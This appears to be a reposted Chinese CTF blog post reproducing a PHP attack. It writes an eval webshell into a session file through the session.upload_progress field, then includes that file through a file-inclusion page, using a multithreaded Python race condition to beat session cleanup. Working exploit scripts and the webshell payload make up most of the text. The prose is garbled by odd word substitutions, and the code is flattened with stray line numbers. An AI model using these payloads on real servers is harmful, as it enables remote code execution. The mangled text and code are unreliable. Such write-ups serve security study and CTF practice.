这次ciscn有一道web题考的就是这个知识点,但过后没有尝试去扫门路,被结尾给的源码卡死了有点儿遗憾,不过还是想本人复现一下这个小trick。
先来看看p
咱们能够post session.upload_progress参数,写入木马。
这个选项能够让咱们本人定义文件名。
例如,管制phsession=flag,则文件名就变为/tmp/sess_flag
这里还有一个配置选项是默认开启的
session.upload_progress.cleanup,这个选项会让post过程完结时删掉所有session文件。
咱们先在php.ini外面关掉这个配置,联合下面的内容写木马试试。
session.php
<?php
$file = $_GET['file'];include($file);?>1
2
3
4
exp1.py
import io
import requests
import threading
sessid = 'aaaaaaa'
def write_session(session):
url = '127.0.0.1/session.php'f = io.BytesIO(b'a' * 1024 * 50)resp = session.post( 'http://127.0.0.1/session.php?file=1.txt', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('fmyyy.txt',f)}, cookies={'PHPSESSID': sessid} )if name == '__main__':
with requests.session() as session: write_session(session)1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
筹备好了,运行exp1.py
来看看session文件目录多了什么。
多了个sess_aaaaaaa
看一下外面的内容。
能够看到,再结尾这边木马曾经被写入。咱们在浏览器试试这个木马。
胜利执行。
能够看到这个session是能够蕴含的,但session.upload_progress.cleanup这个配置是默认开启的,所以这里咱们就须要利用条件竞争了。
import io
import requests
import threading
sessid = 'bbbbbbb'
data = {"cmd":"system('ls');"}
def write(session):
while True: f = io.BytesIO(b'a' * 1024 * 50) resp = session.post( 'http://127.0.0.1/session.php', data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST["cmd"]);?>'}, files={'file': ('1.txt',f)}, cookies={'PHPSESSID': sessid} )def read(session):
while True: resp = session.post('http://127.0.0.1/session.php?file=/Applications/phpstudy/Extensions/tmp/tmp/sess_'+sessid,data=data) if '1.txt' in resp.text: print(resp.text) event.clear() else: print("[+++++++++++++]retry")if __name__=="__main__":
event=threading.Event()with requests.session() as session: for i in range(1,30): threading.Thread(target=write,args=(session,)).start() for i in range(1,30): threading.Thread(target=read,args=(session,)).start()event.set()————————————————
版权申明:本文为CSDN博主「fmyyy1」的原创文章,遵循CC 4.0 BY-SA版权协定
技术支持: 微信刷步数 IP查问